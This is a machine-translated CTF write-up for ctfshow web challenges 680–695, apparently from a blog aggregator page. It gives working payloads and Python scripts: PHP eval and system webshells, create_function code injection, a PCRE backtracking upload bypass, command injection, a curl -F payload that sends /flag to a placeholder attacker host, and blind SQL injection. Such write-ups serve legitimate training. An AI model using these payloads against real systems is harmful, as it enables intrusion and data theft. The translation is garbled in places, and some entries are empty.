当前位置:网站首页>Ctfshow competition original title 680-695
Ctfshow competition original title 680-695
2022-06-30 01:20:00 【Fnylad】
web 680web 681web 682web 683web 684web 685686 No arguments RCE The feeling of 687688689690691692693694695
web 680
At the beginning, it was suggested that post code to run
payload:
code=phpinfo();
Then I tested a lot of functions ban 了 see phpinfo Sure enough , Find out open_dir Directories also limit
direct print_r(scandir(".")) List the current directory
Read again and you're done highlight_file
web 681
burp During packet capture analysis Input 1' or 1=1#
The return is '1or1=1'
Try \ escape
Input '||1=1#\
Equivalent to
''||1=1#\'
web 682
requirement
if(sha256(m)!=="e3a331710b01ff3b3e34d5f61c2c9e1393ccba3e31f814e7debd537c97ed7d3d"){
return alert(e)
}however sha256 Reverse decryption does not work
So the topic is divided into var k=s.split("-")
The first part
if(sha256(k[0].substr(0,4))!=="c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400"){
return alert(e)
}
if(sha256(k[0].substr(4,8))!=="f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"){
return alert(e)
}Blasting script
import hashlib
flag=" "
s="0123456789abcdef"
for i in s:
for j in s :
for k in s:
for l in s:
string=i+j+k+l
m=hashlib.sha256(string.encode("utf-8")).hexdigest()
if(m=="c578feba1c2e657dba129b4012ccf6a96f8e5f684e2ca358c36df13765da8400"):
print(m)
flag+=string
print(flag)
if(m=="f9c1c9536cc1f2524bc3eadc85b2bec7ff620bf0f227b73bcb96c1f278ba90dc"):
print(m)
flag+=string
print(flag)
Get eight ctfshow{592b9d77-}
if(parseInt(k[1][0])!==(c2n('a')-1)){
return alert(e)
}
if(k[1][1]+k[1][2]+k[1][3]!=='dda'){
return alert(e)
}
if(k[2][1]!=='e'){
return alert(e)
}
if(k[2][0]+k[2][2]+k[2][3]!=0x1ae){ 0x1ae =430
return alert(e)
}find c2n function Find out c2n('a')=10;
So at this time ctfshow{592b9d77-9dda-4e30}
if(parseInt(k[3][0])!==(c2n('a')-1)){ 9
return alert(e)
}
if(parseInt(k[3][1])!==parseInt(k[3][3])){
return alert(e)
}
if(parseInt(k[3][3])*2+c2n('a')!==0x12){ (18-10)/2
return alert(e)
}
if(sha224(k[3][2])!=='abd37534c7d9a2efb9465de931cd7055ffdb8879563ae98078d6d6d5'){ a
return alert(e)
}ctfshow{592b9d77-9dda-4e30-944a}
if(st3(k[4])!=='GVSTMNDGGQ2DSOLBGUZA===='){
return alert(e)
}
base32 Decrypt ctfshow{592b9d77-9dda-4e30-944a-5e64f4499a52}
web 683
(int)("0xxxx")=0;
payload:? Show =0x4F1A01
web 684
stay PHP The default namespace is \, All functions and classes are in \ In this namespace , If you write the function name directly function_name() call , When calling, it is actually equivalent to writing a relative path ; And if you write \function_name() Call the function like this , It actually wrote an absolute path . If you're elsewhere namespace Call the system class in , You have to write an absolute path .
create_function('$a,$b','return 111')
==>
function a($a, $b){
return 111;
}therefore payload
?action=\create_function&arg=}system("cat /secret_you_never_know ");//web 685
PHP utilize PCRE Backtracking limit bypasses some security restrictions | Farewell song
The specific principles are as follows p god
According to backtracking, the maximum is 100 Ten thousand times More than that, return to false Bypass
from io import BytesIO
import requests
url="http://31cb6c95-d013-462e-828d-b9d5b11e1942.challenge.ctf.show/"
files={
'file': BytesIO(b'aaa<?php eval($_POST[1]);//' + b'b' * 1000000)
}
r=requests.post(url,files=files)
for i in range(0,10):
u=url+'data/{0}.php'.format(i)
r=requests.post(u,data={'1':'system("cat /secret_you_never_know");'})
if 'b' in r.text:
print(r.text)
Master Yu script
import requests
url="http://3c7c34aa-52d3-48d2-9dec-3679a65588c9.challenge.ctf.show/"
files={
'file':'<?php eval($_POST[1]);?>'+'b'*1000000
}
r=requests.post(url,files=files)
for i in range(0,10):
u=url+'data/{0}.php'.format(i)
r=requests.post(u,data={'1':'system("cat /secret_you_never_know;echo yu22x");'})
if 'yu22x' in r.text:
print(r.text)
686 No arguments RCE The feeling of
getallheaders yes apache The function in , Here is nginx Environmental Science , So use get_defined_vars()
Method 1 :
?code=eval(end(current(get_defined_vars())));&b=phpinfo();
Method 2 : List
normal print_r(scandir)
print_r(scandir(current(localeconv())));
687
payload:
http://3696b171-ef1c-43bc-8d5f-e6fdb623c859.challenge.ctf.show/?ip=127%0acat /flaaag
688
Probably the first one is to treat the input directly as a string
I'm a little confused about the second one , But if it's not filtered We want to curl url -F [email protected]/flag
Try
And then add a point to see
payload :
?url=http://ip:1337/' -F [email protected]/flag '
689
The test site is ssrf Parameters we passed in file Must be http://127.0.0.1/ start ,path Can not have .. Suppose we pass in ?file=http://127.0.0.1/&path=<?php phpinfo();?> Then the page will display the following contents
If we bring in file Replace it with the present one url What's going to happen ? Did you write this page in therefore payload ?file=http://127.0.0.1/?file=http://127.0.0.1/%26path=<?php phpinfo();?>&path=a.php
690
691
order by Size comparison blind Injection
So the real character is c
Write the script
import requests
url="http://deeb3ee4-3bad-42a3-9b5e-c26051eab4ca.challenge.ctf.show/"
s=".0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
k=""
for i in range(1,40):
for j in s:
l=k+j
data={
"username":"' or 1 union select 1,2,'{}' order by 3#".format(l),
"password":"12"
}
res=requests.post(url=url,data=data)
if "</code>admin" in res.text:
k=k+chr(ord(j)-1)
print(k)
break
692
It is equivalent to adding single quotation marks to the incoming characters
;eval($_POST[1]);// => ';eval($_POST[1]);//' %00 =>'';eval($_POST[1]);//''
693
The remote file can contain
694
The final path is
/var/www/html/a.php/.
695
koajs
https://github.com/koajs/koa-body/issues/75
The loophole lies in ctx.request.body.files
If the route of uploading to the file json Format of subject , So among them path Save the file location parsed into the uploaded file to the corresponding file .
边栏推荐
- 眼底出血术后需注意事项//每天必看
- Quick Pow: 如何快速求幂
- Machine learning notes: time series decomposition STL
- 网易云音乐内测音乐社交 App“MUS”,通过音乐匹配同频朋友
- Visual studio 2017 cannot open the include file: 'qopenglfunctions_3_3_core': no such file or directory
- 英伟达Jetson Nano的初步了解
- Shell spec date format
- 在线SQL转CSV工具
- Reading is the cheapest noble
- I learned database at station B (V): DQL exercise
猜你喜欢
![[concurrent programming] if you use channel to solve concurrency problems?](/img/6c/76bcc9b63117bda57937a49cfd8696.jpg)
[concurrent programming] if you use channel to solve concurrency problems?
xshell中怎么切换到root用户
Statsmodels notes STL
How latex enters a matrix
【Games101】Transformation
MySQL installation steps (detailed)
Live broadcast configuration of crmeb knowledge payment system program configuration (method 2)
Vl6180x distance and light sensor hands-on experience
STC89C52 single chip microcomputer simple calculator design and code demonstration
The first unlucky person watching eth 2.0
随机推荐
3-6sql injection website instance step 5: break through the background to obtain web administrator permissions
Kubernetes 核心对象概览详解
清洁、对话、带娃,扫地机摆脱“人工智障”标签
浅析现代Web端im即时通讯开发技术
MySQL function
Comment personnaliser les modèles et générer rapidement le code complet dans l'idée?
Cloud, IPv6 and all-optical network
Transaction summary on June 25, 2022
VIM编辑器常用指令
Seata 与三大平台携手编程之夏,百万奖金等你来拿
挖财的课程靠谱吗,让开户安全吗?
The first unlucky person watching eth 2.0
数字垃圾是什么?跟随世界第一位AI艺术家,探索元碳艺术
Crmeb SMS for program configuration of knowledge payment system
Twitter launches the test of anti abuse tool "safe mode" and adds enabling prompt
【推荐系统】基于用户的协同过滤简明原理与代码实现
How to switch to root in xshell
【Proteus仿真】8位端口检测8独立按键
How to build your own blog website by yourself
Machine learning notes: time series decomposition STL